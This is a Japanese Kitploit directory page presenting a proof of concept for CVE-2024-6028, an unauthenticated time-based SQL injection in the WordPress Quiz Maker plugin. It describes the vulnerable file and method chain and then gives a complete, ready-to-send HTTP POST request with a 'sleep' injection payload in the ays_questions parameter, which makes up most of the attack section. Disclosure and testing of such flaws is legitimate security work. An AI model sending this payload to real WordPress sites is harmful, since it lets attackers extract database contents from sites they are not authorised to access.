Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-6028-Poc — CVE-2024-6028 Quiz Maker <= 6.5.8.3 - 'ays_questions'パラメータを介した認証なしSQLインジェクション | Kitploit
ツール/GitHubGitHub/gmh5225/cve-2024-6028-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubgmh5225/cve-2024-6028-poc

CVE-2024-6028-Poc

CVE-2024-6028 Quiz Maker <= 6.5.8.3 - 'ays_questions'パラメータを介した認証なしSQLインジェクション

リポジトリを見る
572年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-6028-Poc

CVE-2024-6028 Quiz Maker <= 6.5.8.3 - 認証されていないSQLインジェクション ( 'ays_questions' パラメーター)

説明

WordPress用プラグインQuiz Makerは、バージョン6.5.8.3までの全バージョンにおいて、ユーザー指定パラメータのエスケープ不足と既存SQLクエリの準備不足により、'ays_questions' パラメーターを介した時間ベースのSQLインジェクションに対して脆弱です。これにより、認証されていない攻撃者が既存のクエリに追加のSQLクエリを追加し、データベースから機密情報を抽出するために使用される可能性があります。

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-maker/quiz-maker-6583-unauthenticated-sql-injection-via-ays-questions-parameter

ファイル: wp-content/plugins/quiz-maker/public/class-quiz-maker-public.php

クラス: Quiz_Maker_Public

ワークフロー: メソッド ays_finish_quiz -> メソッド get_questions_categories image image image

Poc

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,5,0)]=&action=ays_finish_quiz

image

ツールをダウンロード